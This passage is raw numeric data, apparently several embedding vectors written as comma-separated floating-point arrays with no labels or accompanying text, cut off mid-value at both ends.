0.031887565,0.0075182677,0.007949683,0.024412654,0.0260385,0.049272288,-0.035910964,-0.017605118,0.032113094,0.005768657,0.0130522875,0.024431143,-0.05425961,-0.012564807,0.0010408929,-0.041999087,0.04081296,-0.008256564,-0.052651905,0.05571736,-0.010827383,0.000048092315,0.056294292,-0.013653798,-0.01260605,0.023230067,-0.017823242,-0.06438899,0.020508582,0.040617853,0.04016332,-0.02029603,0.03305831,-0.008929492,-0.014965845,0.050270677,0.008546191,-0.028248148,0.051136073,-0.0105767585,-0.054937545,0.004488867,-0.0071906038,0.025518958,-0.0074723526,0.0020818277,-0.060754746,0.006249017,-0.036011834,0.0040531834,-0.037598617,-0.048859637,0.0030864687,0.06699066,0.01100882,-0.00072622264,-0.0062180245,0.012549203,-0.019233784,-0.02723993,-0.0003151815,0.047319997,-0.08240267,0.012534155,0.018247234,-0.01114756,-0.01231512,0.044844676,0.008076794,-0.080963634,-0.035781506,-0.0005025095,-0.04857955,0.049474407,0.023641992,-0.030357273,-0.0017462877,-0.028965103,0.009218411,-0.03949902,-0.04648462,-0.04284125,-0.037547585,0.068223424,-0.016666906,-0.017038193,0.024388038,0.0076090335,-0.004317192,-0.033691134,-0.06468473,-0.009142754,0.056552276,0.05845149,-0.030001463,0.03504002,0.005489982,-0.0035424018,0.020025173,0.015163131,-0.041084815,0.016737754,0.04768444,-0.0059575117,-0.026837664,0.00010808913,-0.004229776,0.06903594,0.003660248,-0.021454725,-0.02008638,-0.008867373,-0.061125074,0.097532265,-0.08766251,0.029880565,-0.03776034,-0.041433882,-0.036253262,-0.023329835,0.02436034,-0.06064418,0.013186372,-0.050629046,0.043047346,-0.087243855,-0.005665984,-0.03930763,0.06693648,0.029080251,0.025252325,0.03660191,-0.007995082,-0.0004316944,0.028053071,0.02284646,0.019055072,0.04279608,0.056352112,0.03141396,-0.058455672,0.08963866,0.062491875,0.059299074,0.017392775,-0.0082917875,0.045344155,-0.0017921143,-0.021842292,-0.036616467,-0.02601855,-0.018985571,0.006531069,-0.0016349074,0.03409347,-0.007486419,0.01294809,0.009830248,-0.003683729,-0.021832392,-0.034180637,0.038575925,0.016893022,0.02095479,-0.037551675,0.0031654402,-0.015424101,0.0145546235,0.044681128,0.04291691,-0.01851443,0.03300911,-0.009341663,0.022212692,-0.02800764,-0.040653367,-0.036685906,-0.007060094,-0.023049492,-0.03708251,-0.021412155,-0.030066045,-0.05714911,-0.01671853,-0.002762311,-0.022214042,0.024705239,-0.04376424,0.00079199305,-0.023289267,0.06266658,0.00925616,0.0041293735,0.028826373,0.028214348,-0.012321091,-0.04667408,0.026625106,-0.019985514,-0.017147075,-0.032711446,-0.032806445,0.009715751,0.002157691,0.03573196,0.029278792,0.061473552,-0.012217847,-0.029503893,0.001990873,0.036830325,0.017255973,-0.039187636,-0.039675917,0.019596731,0.024655912,-0.009321478,-0.0127442125,-0.020850835,0.005720156,0.021975515,0.00069198664,0.010848164,-0.040762335,0.06785807,0.00707948,0.06382306,-0.0065192515,0.028647812,-0.040135298,-0.016570337,0.0029384748,0.06446261,0.0127273,0.010795643,-0.037637807,-0.04795027,-0.045758072,0.066463485,-0.019402923,-0.025144551,0.031055389,-0.021968845,-0.039460074,-0.009681187,-0.0481419,-0.000055650533,0.043063242,0.080080874,0.07710204,0.008665123,0.015158263,-0.03943717,0.028133713,-0.0030937858,-0.046100732,-0.0026434376,-0.00089385046,0.00083337165],[0.026973672,0.04638635,-0.19048671,-0.09279911,0.061442938,0.005269358,0.016241968,0.013390926,-0.03776794,-0.0018367579,-0.03261613,0.02775309,0.018538171,0.059453744,0.014329939,-0.04080814,-0.009898414,-0.058541607,0.00927732,0.06718275,-0.016943658,-0.04525049,-0.029948957,-0.08802781,0.067241505,0.05508341,-0.00023370265,0.040349983,-0.043535978,0.015079714,-0.0134875905,-0.0043584234,-0.05284308,0.053963795,-0.08120014,-0.0368573,0.030033227,0.011842954,-0.014566969,0.028725252,0.05977494,0.00788771,-0.0030309942,-0.0005996493,0.013326891,0.006122055,0.0027984763,0.043336116,0.04785502,-0.089531794,-0.018987061,-0.027289229,0.0022546335,0.030637458,0.045522287,0.016863756,-0.0042849667,0.0035464058,0.0029134268,-0.041110173,0.04418479,0.022861596,-0.0916664,0.04871123,0.0070456997,0.00025074228,-0.03145093,-0.011472744,0.028877253,-0.020577727,0.09421246,0.00889681,-0.035280097,0.01946496,-0.047753148,-0.0045168055,-0.029265977,-0.025926135,0.008201602,0.009114847,0.032193135,-0.044074126,0.06317623,-0.030019106,0.06731952,-0.05683299,-0.041446615,-0.0034182232,-0.03355676,0.052966584,0.016049495,-0.04624047,0.039533164,-0.0019075538,-0.06236409,0.013685515,-0.00475988,0.012951862,-0.04367463,-0.015888436,-0.03024752,-0.0009772461,-0.013931747,-0.0024600015,0.03264713,0.07196433,-0.019530592,-0.00015757816,-0.017150935,-0.023004783,-0.006698665,0.041638773,-0.01908947,-0.010120876,-0.017890032,-0.0011417173,-0.00301436,-0.07682189,-0.051684428,0.029168097,0.025787149,-0.038855024,-0.06677215,0.05129161,0.0017514122,0.008422394,-0.05723676,0.027259558,-0.024438318,0.0014693638,0.0059080515,-0.009963579,-0.02914074,-0.013142743,0.0015414745,0.033198755,-0.024969755,-0.04108194,0.023684217,0.0069766496,0.067946255,0.03551262,-0.0029926517,-0.04379558,0.0015999101,-0.06418719,-0.036295943,-0.028580803,-0.038861044,0.040085733,0.010444367,-0.014646843,0.00038439,0.013574941,0.017555626,0.002650257,-0.028547637,0.01139918,0.005197837,0.05296523,-0.00028013106,0.02253788,-0.04127686,0.05790871,0.024566203,-0.043706827,-0.03704878,0.044630747,-0.0040881275,0.035320733,-0.059585314,0.0144684855,-0.0063083638,-0.027501827,0.040132053,0.005243624,0.05617506,-0.041897055,0.0065672505,-0.03166614,0.023501653,-0.06558998,0.056108646,0.013790099,-0.02892908,-0.03284618,0.014822154,-0.043858204,0.0008531116,-0.025105175,-0.001886573,-0.0078098867,-0.07111132,-0.017113794,-0.004372311,-0.04526949,0.04243015,-0.03483534,0.03945409,-0.045747288,-0.023434602,-0.05388077,-0.039198164,0.015886405,-0.053595144,0.056432225,0.02306055,0.007959965,-0.046936534,0.028412933,0.076821856,0.005531706,0.030261042,-0.015976207,0.03294916,0.047987036,0.0058450676,-0.012508824,-0.010283321,0.0037177375,0.022469087,0.002740146,0.0003883658,0.00026202324,0.039021134,-0.0033038256,-0.014546504,0.024446232,-0.02788704,-0.021740962,-0.004304735,-0.08471856,0.046966564,-0.018488271,-0.00535899,0.04802891,0.0121757705,0.031093048,-0.016196666,0.03593416,0.006617449,0.0502182,-0.025035338,0.08016566,-0.0520464,-0.003887079,-0.0019964816,-0.0057698954,0.016000355,0.02329386,-0.034860115,-0.010481438,-0.0020309917,0.028484447,0.07118758,-0.030795714,-0.049313508,0.034040697,0.00065112324,-0.0059032366,0.01620626,-0.06417094,-0.023214264,-0.039116718,-0.05391373,-0.0408436,-0.020074436,0.011780374,0.013724798,0.015774805,0.008660739,0.05653965,0.02658228,0.03360266,-0.0035382754,0.02149099,0.0014113797,0.0062073,0.019238811,-0.0012235579,-0.039902445,0.0044063213,-0.03954586,0.040516656,0.0011614178,-0.0075390222,0.020356622,-0.0016943234,-0.00062631216,-0.033684213,0.041383658,-0.019955538,-0.039778087,0.031786013,0.0019089582,0.016681679,0.035672016,-0.0054693413,0.029600577,-0.07373427,0.055891123,0.018958438,0.044507753,0.026119905,0.0039667143,-0.03983731,-0.005868496,-0.01216548,0.044917185,-0.043453097,-0.06299789,0.030568635,0.017613372,0.0313765,-0.011807121,0.0057191546,0.04100096,0.06135772,0.0018213621,0.025820982,-0.0044773812,-0.053060737,0.0019047343,-0.01512938,-0.026970975,0.074581206,-0.034307867,0.01776976,0.006871833,0.0033842216,0.037090622,-0.0011838734,0.032595735,-0.04083438,-0.04821128,0.018813102,0.036272787,0.036274143,0.0008408499,0.049553115,0.038545597,0.04932894,0.0076691513,-0.019613614,-0.010631612,-0.0020411925,-0.032151874,-0.0044290274,0.06597294,0.013915898,0.0042567635,-0.010774058,0.0050366535,-0.031211445,0.033192497,-0.012987825,0.035285626,0.026814021,0.016044015,-0.04937708,0.06812197,0.007004597,0.024974497,-0.02316741,0.011398125,0.013308442,0.017644629,-0.00035662405,0.008641547,0.02753406,-0.0006509601,0.0002579407,-0.030342238,0.017051507,-0.052761633,-0.018831125,-0.098794416,-0.002594165,0.017237876,0.05111131,-0.017632127,-0.0047749593,0.052537095,0.011789492,0.026393836,-0.020009374,0.013462748,-0.013132762,0.018033536,-0.005619336,-0.0331068,0.007928011,-0.05830002,0.021560177,0.017072676,-0.064422086,0.029365344,0.056532834,0.014725325,0.09681484,-0.026920607,-0.044300284,0.04337308,-0.0025220914,-0.0058698854,-0.017420838,-0.028827881,-0.020739492,0.019350111,-0.014440181,-0.007677436,0.028922282,-0.03703755,-0.06290108,-0.001183093,0.028321143,0.06048282,-0.026830846,-0.0028535302,-0.054238833,0.008223632,0.05619572,0.004216251,0.011967897,-0.0050045215,0.046003643,0.029697005,0.06107377,-0.015897566,0.016630664,0.08346544,-0.013319291,0.069962986,0.042626537,0.02374988,0.0066010035,0.009402488,0.021297758,-0.008407486,0.0076264935,0.0451949,-0.079727985,-0.058056056,-0.05354299,0.008687562,0.045085337,0.030467033,-0.021655353,-0.06737316,0.02416063,-0.009970539,0.005527317,0.022620862,0.013860842,0.13167125,0.0051711993,0.043319147,-0.014667636,-0.0136661595,0.0251845,-0.008166349,0.04488561,-0.0012118861,-0.015262641,0.0081978375,-0.04053731,-0.003957936,-0.067802034,0.054136526,-0.0064490996,-0.090069324,0.0048155724,-0.024349855,-0.073073104,-0.018361092,0.0069467397,-0.025483973,-0.029640593,0.008206505,0.061088543,0.033230722,-0.04564299,-0.034937102,-0.022526544,-0.020392971,0.03245506,0.04157487,0.016037762,-0.04129154,-0.029489253,0.047957387,0.016070988,0.034220967,-0.012413712,-0.07899821,-0.006044524,-0.021662574,-0.0039618006,-0.00016648314,0.018196419,0.029407915,0.06679588,-0.015497727,0.025027566,0.03176205,-0.005779342,0.046342168,-0.0313923,-0.05347963,0.06673469,-0.002720978,0.007572008,0.006385596,-0.001972044,0.069836706,-0.030090947,0.0025805985,0.0006187764,-0.026258526,0.058743194,0.036226537,-0.060884427,-0.037833486,-0.02761491,-0.028583053,0.019347565,0.014991429,-0.096083194,0.0041188216,0.0015177145,0.016418455,0.015147257,-0.055874165,-0.03278882,0.010381369,0.0017183652,-0.032453932,0.012830272,0.009383838,0.040670075,-0.00692463,0.011949155,0.00069882063,0.0040568346,0.020442849,0.024249071,0.0062742783,0.0074145724,0.0131414365,-0.075860806,-0.018071283,-0.008035638,0.01844317,-0.046990644,0.0367407,-0.054520596,-0.008229385,-0.0076694004,-0.057664666,-0.049887035,-0.03611161,-0.007843276,0.071180165,0.01941768,-0.015789041,-0.011348142,-0.028711176,-0.012653375,-0.021462986,0.008410126,0.02403143,-0.05613426,-0.010217146,-0.029091593,-0.028858557,0.010752582,0.022448279,-0.0073111085,-0.057677798,-0.07001718,0.038853023,-0.031586584,0.046681847,0.06109293,0.0067648515,0.0095226,-0.049202252,0.008042813,-0.020342022,-0.031944815,-0.007697407,-0.009269595,0.009080964,-0.048741955,-0.0062460895,-0.011756377,0.0034498284,-0.005165533,-0.033976816,-0.07359383,-0.004593784,0.05430429,0.086503915,-0.06326344,0.02064838,0.026681064,0.042754687,0.028957538,-0.023463026,-0.034268282,0.06004215,0.047009118,0.0038851846,-0.0026650669,-0.007454311,-0.03767115,0.046863105,-0.03135543,-0.031061007,-0.061202005,-0.0085035125,-0.023295697,0.04470821,-0.065140516,0.024297852,-0.011286433,-0.027942432,-0.027120627,-0.033560127,0.007004423,-0.02313213,0.021538012,-0.028047087,0.01088252,-0.1004237,0.016695999,0.028085852,0.042846706,-0.005260079,0.040539864,0.063263685,-0.02884379,-0.0084136445,0.032035396,0.039546747,0.00274241,0.017026035,0.08552249,0.031832695,-0.019476693,0.058481317,0.04554781,0.06398399,-0.003005552,0.0037350624,0.018264193,0.020404393,-0.012181431,-0.015637599,-0.0041489424,0.0017106045,-0.02086331,-0.05934849,0.0075272773,0.02711859,-0.0070903534,0.0034043367,0.005505121,-0.016927488,-0.0406224,0.059755925,0.007389954,-0.0015811133,-0.049446795,0.02422189,-0.013145819,0.056645833,-0.005565893,0.005593491,-0.015998138,0.037592124,0.010066102,0.022795197,-0.029315662,-0.011011809,-0.012302287,0.025613438,-0.0348227,-0.04935664,-0.015931822,-0.0033314575,-0.044087023,-0.010383059,-0.011938771,0.014881859,0.026694065,0.0000020116947,-0.015450565,-0.054303974,0.10784575,-0.0027059407,0.040512633,-0.009230407,0.05034209,0.005636869,0.000063341926,0.03779356,0.018894969,0.0024949803,-0.054509487,0.028703487,0.017145,-0.06496763,0.059950557,0.018536182,0.023572259,-0.012429782,-0.021850182,0.050802562,0.018314382,0.023626022,-0.016795116,-0.009554877,-0.021569679,-0.031473797,-0.012550687,0.022946937,-0.035936188,0.021390798,0.011631742,-0.015984053,-0.012016907,-0.010425737,0.07776265,-0.008146669,0.038650397,0.009844191,0.02138084,-0.021401541,0.0016729995,-0.042208426,0.00294946,-0.003435825,0.0012925722,0.04248567,-0.056092642,-0.004238537,0.056141958,-0.00800647,-0.043703847,0.024620421,-0.024518333,-0.025111603,0.02791198,-0.062401246,-0.0058959406,0.04577628,0.023773085,0.11205383,-0.014488049,0.009606804,-0.03175126,0.018678559,0.0067687565,-0.037173223,-0.01265523,0.0059333984,-0.05372374],[-0.015442101,0.06304012,-0.1538202,-0.116420224,0.07804033,-0.01695208,0.015186013,0.055355486,-0.009875658,-0.02249479,-0.051684786,0.026328726,0.07239771,0.016457228,0.023188336,-0.0076735034,-0.028887762,-0.03573755,-0.0371698,0.078972585,-0.029489378,0.006214485,-0.012526289,-0.040825672,0.028902953,0.025480295,-0.018446725,-0.019838935,-0.040011887,-0.0030827764,0.006650554,-0.030656133,-0.011782919,0.0017175933,-0.04617741,-0.07336513,0.038481604,0.040659845,0.05739079,0.018036168,0.08847977,0.030527683,0.0070300903,0.012582398,0.008683597,-0.01879652,0.010257221,0.02175098,0.07376129,-0.057827037,0.014928929,-0.06274416,0.06069676,0.005051004,0.11710089,0.05195127,0.0312723,-0.020119898,-0.010643912,-0.022501105,0.04580793,0.024670063,-0.07214173,0.025827313,0.013397779,-0.007974011,-0.056235597,0.023783829,-0.0067326613,-0.046446614,0.080644034,-0.004129104,-0.027287807,0.05848027,-0.070927694,-0.014788968,-0.037639745,-0.013215934,0.013655054,0.0340506,0.021058785,0.011023737,0.022766216,-0.0054042055,0.044618364,0.016769834,-0.036706515,-0.009701792,-0.027077943,0.052873533,0.01946215,-0.03765432,0.039866842,-0.0045081703,-0.037324764,0.008625584,-0.014614568,0.029341409,-0.038489487,-0.024563862,-0.047702074,-0.015523491,-0.012034462,-0.04201691,0.050948825,0.025340332,0.0066574058,-0.00032231168,-0.02587275,-0.00466039,-0.031206764,0.057965904,-0.03327282,-0.022470832,-0.031749647,-0.03468018,0.0016332605,-0.032979626,-0.018598748,0.01816146,0.037215583,0.018772338,0.0043294835,0.010813531,-0.0022885816,-0.026637767,-0.06383573,0.008479311,-0.0333287,-0.033986267,-0.018891342,-0.03567721,-0.03922662,-0.0034421997,-0.02228889,0.038623214,-0.03232741,-0.0133211,0.02545123,0.023380516,0.05334422,0.026232904,-0.040417228,-0.06229411,-0.0038214782,-0.06702432,-0.0059948303,-0.07463054,-0.030913899,0.00026414447,0.018223606,0.014217223,-0.00010748068,-0.00066975725,0.024930434,0.007024881,0.00949198,0.009406358,-0.001163892,0.047372665,0.02906305,0.030980665,-0.068347245,0.036723483,0.0017731896,-0.049673207,0.012242101,0.007898542,0.0071768365,0.032641813,-0.08882041,-0.03649749,-0.008908769,0.0010096788,0.024703842,0.02078674,0.056535956,-0.0026047283,-0.011730253,0.00026185322,0.04054189,-0.07733702,0.08213336,-0.038609028,-0.022100316,0.0030511797,-0.019952131,-0.03929818,-0.017662024,-0.032371584,-0.0017466419,0.028014112,-0.0024331203,0.011472822,-0.050527487,-0.034347035,0.013018506,-0.0105425315,0.035717174,0.0012956349,-0.010526933,-0.02696078,-0.03197085,0.013813752,-0.06437408,0.036820486,0.005914223,0.009961883,-0.04216451,0.013207602,0.051631004,0.0019185138,-0.004155453,0.027790502,0.0066888137,0.037098303,0.010424428,0.002837276,-0.005546575,-0.03150992,-0.010326162,0.007818751,-0.008712391,0.003750341,0.023681598,-0.0015512436,-0.01388957,0.005035206,-0.028289022,-0.003817451,0.01949491,-0.07710824,0.07218648,-0.03707312,0.02218988,0.037854202,0.008863376,0.04052324,-0.00051966135,0.041146602,-0.0048427517,0.01751286,-0.025167705,0.057196323,-0.047640476,-0.0060630064,-0.00454326,-0.01839206,0.011399726,0.054909896,-0.017568236,0.0051128953,0.012943221,-0.037515465,0.057793073,-0.02808407,-0.045753937,-0.0018346533,0.03196171,0.044656314,0.022167979,-0.036161296,-0.038305998,-0.023213618,-0.057964154,-0.07516372,-0.0022372245,0.013815574,0.02995216,0.038122915,-0.004472001,0.044119358,0.013925049,0.015714318,0.010554362,0.015534099,-0.05053772,-0.0071342387,-0.013122123,-0.0021448247,-0.02779938,-0.0058208825,-0.03234086,0.023369338,0.008443646,0.013764389,0.0048822006,-0.0041857883,0.010115949,-0.032578792,-0.011496284,-0.009781326,-0.048824787,0.0012447344,-0.06753523,0.0011823445,0.01866878,0.019507822,0.023746628,-0.048222233,0.038162015,0.037510335,0.037213698,0.032653026,-0.0073618824,0.00390788,-0.020015094,-0.063371874,0.048650213,-0.024632357,-0.025176503,0.0028306833,-0.025315728,0.016365243,-0.039125215,0.043569613,0.0053202794,0.0073149586,0.03657858,-0.051692456,0.015828455,-0.062281918,0.031111062,0.0013948585,-0.010289099,0.06240177,-0.03721232,0.026957298,-0.008486392,-0.010357612,0.025629917,0.015995866,0.030594591,-0.029564833,-0.044838775,0.02833404,0.005725246,0.0266204,0.0013636888,0.009093313,0.04458079,0.0117577035,0.012246585,-0.050996177,-0.034465186,0.040749554,-0.072136454,-0.02712832,0.06504405,0.021461729,-0.028217373,0.021570407,-0.00085667707,-0.027326351,-0.012322435,-0.007217619,0.04403489,0.026456783,0.002467875,-0.01643418,0.04269921,0.010060855,0.017539706,-0.035752874,0.015947206,0.01573634,0.015411479,0.008268323,0.009726961,-0.00096884987,-0.038084686,0.013268716,-0.047335956,0.01878725,-0.044108752,-0.046038702,-0.07884841,-0.0133678885,-0.01615658,0.001986549,-0.035014506,0.015986893,0.026887419,0.031366996,0.0638778,-0.017576162,0.043678243,-0.002681865,0.019029029,0.062940896,-0.005258938,0.007071945,-0.025222188,0.012527282,0.06240769,-0.08312136,0.01169246,0.037320487,-0.0023034161,0.052836142,-0.041632213,-0.06278273,0.03199266,0.0026555124,-0.0037308307,-0.008700061,-0.03326906,-0.026131127,0.034941763,0.018869791,0.029815644,0.029078415,0.00084058155,-0.067842655,-0.008039883,0.016291142,0.07783468,-0.013974687,-0.014836775,-0.030915754,0.02462433,0.0056121834,0.014399554,0.031080792,0.052928165,0.0018452387,0.0407776,0.042078137,-0.030377693,-0.055722184,0.029370634,0.0055964026,0.06595707,0.029733768,0.004400138,0.031835943,-0.013267696,0.04460758,0.01016232,0.034273364,0.044413827,-0.054038268,-0.04661933,-0.043722946,0.03242452,0.048007898,0.037916515,-0.034155663,-0.054812647,0.024413185,-0.0030697645,0.050948184,0.012093599,0.040768553,0.13405392,0.012510518,-0.01686435,0.018655857,-0.0149425855,0.0078009614,0.02397479,0.01195835,-0.020932445,0.008706478,-0.00593258,-0.03825906,0.022859162,-0.02838488,0.041216273,0.043592036,-0.05117737,0.059257247,-0.0034529234,-0.08276599,0.013638787,0.010808314,-0.03600301,-0.017801117,0.02362562,0.047785476,-0.021227958,-0.0325539,-0.028874626,-0.00235803,-0.018574443,0.05824028,0.017250607,0.0077769025,-0.0033850549,-0.00643378,0.042917058,-0.0389721,0.02007675,-0.01336448,-0.07534035,-0.032746144,-0.021477025,0.046220258,-0.010770651,0.03075132,0.008997199,0.07337189,-0.037702635,0.00949661,0.04400526,-0.0035976814,0.043306034,-0.017453197,-0.0293585,0.010106227,0.04941654,-0.018180475,0.0071763988,0.009783853,0.07363838,-0.043023266,0.013754701,0.034548715,0.003471441,0.024372075,-0.009502545,-0.06916885,-0.011200326,-0.045931187,-0.022854213,-0.014313763,0.0308592,-0.08555195,0.03021314,0.025414545,0.042448543,0.058935832,-0.059237722,-0.032096747,0.024938801,0.0018046148,-0.029212842,-0.018866392,0.030437948,0.04953461,0.0051245596,0.02432328,-0.034291252,0.013378667,-0.004052583,0.036938116,-0.012738402,0.044778313,0.04608345,-0.051269487,-0.006137755,-0.026368609,0.018512925,-0.05800985,0.057372574,-0.027702594,-0.040129304,-0.031170776,-0.032345396,-0.023687651,-0.07216068,0.05661899,0.020093372,0.03718177,0.0038628404,-0.035548586,-0.01967149,-0.021667717,0.034908403,0.028602554,0.0639122,-0.07640773,0.0019090031,-0.020280737,-0.030491656,-0.011762828,0.027358241,0.018777449,-0.04708443,-0.077530086,-0.028975073,-0.047909014,0.0427779,0.022722017,-0.04129506,0.00647963,-0.019834805,0.0031553549,-0.012787935,-0.023051433,0.012403678,-0.032814883,0.033740338,-0.037984293,-0.009791593,-0.026368262,-0.001195947,-0.0036559359,-0.04084704,-0.12628426,0.0007028367,0.044157475,0.05847775,-0.0668691,0.027506439,0.04976452,0.00994491,0.036062047,-0.004479521,-0.011967045,0.010848307,0.028791787,-0.043231614,0.005212437,-0.00024521656,-0.04942524,0.07105893,0.017878486,-0.02584776,-0.02824971,-0.0664831,-0.051234957,0.06664487,-0.09134704,-0.0013480393,-0.03173017,-0.042780783,-0.025491906,-0.009913166,-0.01464862,-0.051759228,-0.028420221,-0.080355376,0.038979303,-0.03780954,0.03226687,0.0142738335,0.04810293,-0.0004980162,0.032703083,0.011277637,-0.00033295105,0.005373876,0.038195852,0.05850917,-0.0067953216,0.054174505,0.07720357,0.07165442,-0.04460931,0.08058739,0.061559606,0.022747148,0.036717292,0.017464181,0.017871518,0.031848855,-0.02725316,-0.057756115,-0.021895332,0.0018527651,-0.018048765,-0.06874652,-0.02072361,-0.002114806,-0.020619309,0.008921618,-0.01383975,-0.005122253,0.014945697,0.061588395,0.018197926,-0.015180313,-0.057033047,0.032281328,0.022332964,0.03727407,0.025965465,0.027573125,-0.05334321,0.036968388,0.0014133657,0.0058674184,-0.030932035,0.00056092924,-0.020931887,-0.0020196717,0.000832866,-0.036574263,0.027282774,-0.007840672,-0.041793916,0.0040651616,-0.02094331,0.03112886,0.006701481,0.000048674312,0.01743948,-0.01891299,0.03233196,-0.032505654,0.020952355,0.0017025435,0.044661846,-0.033052012,-0.021599662,0.0672673,0.018008024,0.03453416,-0.07481895,-0.020759335,0.04309488,-0.04513498,0.028142001,-0.005837668,0.03694307,-0.023397643,0.004151013,0.00092326925,0.045534756,0.043640796,-0.021928651,-0.01772446,-0.016163614,-0.058586646,0.025922682,0.008973357,-0.052601393,0.009652121,0.026506454,-0.010471198,0.010408431,-0.029646574,0.05272868,0.0051148143,0.06312679,0.010395807,-0.010787998,-0.040224217,-0.002585256,-0.020817215,0.000541753,-0.0007503364,-0.004265233,-0.02900615,-0.034631792,-0.027295412,0.06349184,0.01576217,-0.01283864,0.016834393,-0.03334307,-0.022617951,0.024311999,-0.049514674,0.0013421233,0.015301195,0.0610514,0.103990644,-0.006873036,0.02111356,0.021225963,0.020989088,-0.03766292,-0.014447743,-0.0026922836,0.009040829,-0.037506264],[0.0521254,0.07880265,-0.16413432,-0.08120511,0.11335725,0.04542554,-0.0070583057,-0.0009588279,-0.025205178,0.0144503,-0.001367574,0.035187013,0.060077034,0.02708043,0.011290539,-0.03623955,-0.021674186,-0.066046104,-0.040269595,0.049735792,-0.050605163,-0.015781596,-0.007852996,-0.03755456,0.07686565,0.05751991,0.03958682,-0.015033547,-0.01291915,0.020531405,-0.012596879,0.03133893,-0.050960068,0.0463472,-0.085313514,-0.03762784,0.0034211115,0.046273395,-0.024372486,0.01897471,0.057462007,0.05165464,-0.0009394133,-0.037982687,-0.019301653,-0.023733221,0.0070684995,0.009566768,0.07335678,-0.028298069,-0.010979731,-0.038631037,0.010091854,0.047158897,0.08071372,0.0049190386,-0.005642809,0.005662033,-0.01843846,-0.06787343,0.06612142,0.06508537,-0.088219866,0.038426537,0.042202197,-0.020737687,-0.061266325,0.033747584,-0.003240949,-0.0333856,0.07388258,-0.018399058,-0.01598111,0.047437347,-0.030323299,-0.032904156,0.007796436,-0.036583662,0.012441769,0.044787183,0.013115267,-0.015840111,0.06584269,-0.028502172,0.032074474,-0.041998543,-0.032824796,-0.01616419,-0.028675802,0.03264988,0.03986754,-0.020029096,0.0050204033,-0.015771896,-0.029264104,0.016771512,-0.010277176,0.024927482,-0.048327032,-0.0007010753,-0.0641992,-0.03280518,0.031952426,0.02023367,0.0037055274,0.03340313,0.051662598,-0.004877931,-0.0048122266,-0.019572236,-0.007015584,0.024471303,-0.035873573,-0.038920194,0.015660798,-0.008478966,0.028619232,-0.04440021,-0.015861586,0.044027958,0.037501533,-0.023793135,-0.022829233,0.035425726,-0.0011318779,0.0054801344,-0.050652422,0.009750062,-0.04897202,-0.011891404,-0.012281039,-0.011168617,-0.012332498,-0.035808098,0.011952873,0.043380067,-0.0019303395,-0.03134626,0.008906666,0.004686002,0.042444773,0.057468683,-0.025835805,-0.04703176,-0.021685615,-0.05132407,0.013263629,-0.06872301,-0.009321353,0.0035821146,0.03777232,0.021535419,-0.0038490363,-0.000032480955,-0.00997886,-0.00010560528,-0.036991455,-0.0032575289,0.018383995,0.044849303,-0.0008913654,0.042441513,-0.06675455,0.052299786,-0.009088108,-0.042829342,-0.033110045,0.029377678,-0.0011264653,0.02887273,-0.06790787,-0.018764788,0.022125218,-0.021898704,0.038579497,-0.017194696,0.031511124,-0.029325524,0.03425925,-0.030961176,0.020948745,-0.04549523,0.07871732,-0.008810485,-0.00082387764,-0.020810124,0.0053008692,-0.029440785,0.039643977,-0.014491716,-0.026568672,0.023130126,-0.06469276,-0.019547857,-0.029816404,-0.08022195,0.013891593,0.0052516446,0.039219014,-0.048600037,-0.041446753,-0.026441142,-0.058424916,-0.002654043,-0.06121466,0.04713664,0.0020679478,-0.0041310242,-0.038026605,0.010027492,0.09234594,-0.006937866,0.02087151,0.010928554,-0.003601187,0.007402454,-0.016685177,0.0012869552,-0.020730464,-0.006339666,-0.011576844,0.009211662,-0.012168502,-0.008352119,0.060830235,-0.022419149,-0.039060492,-0.024410183,-0.011443341,-0.018912686,-0.014968067,-0.0886153,0.05083064,-0.031389486,-0.02867374,0.040274184,0.00585831,0.049960535,-0.015299446,-0.00037206814,-0.005837614,0.058101438,-0.026779825,0.063897364,-0.02292271,-0.004644158,0.013844978,-0.04426889,-0.0035348763,0.06311076,-0.019525342,-0.00218644,0.026367774,0.02730478,0.04352015,-0.027017852,-0.06872388,0.024400132,0.03143656,0.008568703,0.028576983,-0.051242758,-0.024202114,-0.058031477,-0.03618729,-0.049451053,-0.012810764,0.009045068,0.02617875,0.018859513,0.01094322,0.04450254,0.018584196,0.029069986,-0.0016759442,0.043349046,-0.0071145277,-0.051776707,-0.0062144976,0.009109646,-0.03478818,0.031756055,-0.01776219,-0.022012124,0.0029299962,0.026674641,-0.003794016,0.010129151,-0.014299992,-0.027062561,0.0058841137,-0.028297277,-0.055379093,0.04424907,0.021671565,0.01814005,0.023200285,0.0183558,0.046777844,-0.09118163,0.04464584,0.026462944,0.015555872,0.046420004,0.0071943426,-0.05804434,0.018367175,-0.00083015516,0.064578414,-0.02144916,-0.06981197,0.0011974243,-0.025146829,0.025393961,-0.028821334,0.019669972,0.03739429,0.052407075,0.02531052,-0.02264308,0.03243895,-0.03908937,0.043102615,0.008512263,-0.035365228,0.06820543,-0.03477439,-0.00297751,0.00033691982,-0.015170817,0.053903334,0.010046441,0.046987124,-0.040811524,-0.023978643,0.046372876,0.04053485,0.015425669,-0.019988688,0.075981796,0.03393854,-0.0071846666,0.030689007,-0.035725858,0.004277876,0.010854239,-0.058472868,-0.022946216,0.04602599,0.05930944,-0.0068123364,-0.0040628314,-0.007793575,-0.026177632,0.011077149,-0.034229286,0.008427693,0.04794522,0.0047144643,-0.038745955,0.02389407,0.035089623,0.0015344203,-0.021974597,0.008675451,0.04481224,0.040245652,-0.0049161687,0.010022862,0.023174886,0.005485586,-0.049273405,-0.023312053,0.026845658,-0.03404877,0.011536082,-0.099892676,0.021849021,-0.013581478,0.049694363,0.0062417947,0.005710186,0.025954597,0.021171907,0.037683763,0.002898264,0.028342709,-0.03169112,0.01038881,0.013011128,-0.015667945,-0.020026265,-0.04872852,0.0036888346,0.023935288,-0.0808031,-0.033962283,0.01924791,0.022901537,0.107967734,-0.004040006,-0.043157306,0.008958796,0.0033133824,-0.034156296,0.022807332,-0.033196695,-0.03799906,0.04095306,-0.0024515789,-0.012555782,0.031917088,-0.018739827,-0.04824562,0.007871493,0.032009743,0.043240603,-0.0044062156,-0.008522449,-0.048052512,0.05126931,-0.0011888095,0.008933755,-0.00288678,0.018645013,0.03613415,0.07016918,0.027981497,-0.019641241,-0.030103927,0.044874057,0.022192659,-0.0120946625,0.008669007,-0.0026955132,0.016149584,0.0058414754,0.032702353,-0.0026823326,0.033446323,0.013200247,-0.0787253,-0.059077524,-0.0617011,0.011882622,0.04293902,0.046137482,-0.042327575,-0.06179397,0.031727295,0.025186073,0.0065944623,0.028692441,0.046427455,0.11436669,-0.026415598,0.030289983,-0.011273788,-0.025713554,0.004727436,0.033840798,-0.011413905,-0.008959104,-0.025108954,-0.011968343,-0.029219456,-0.00583004,-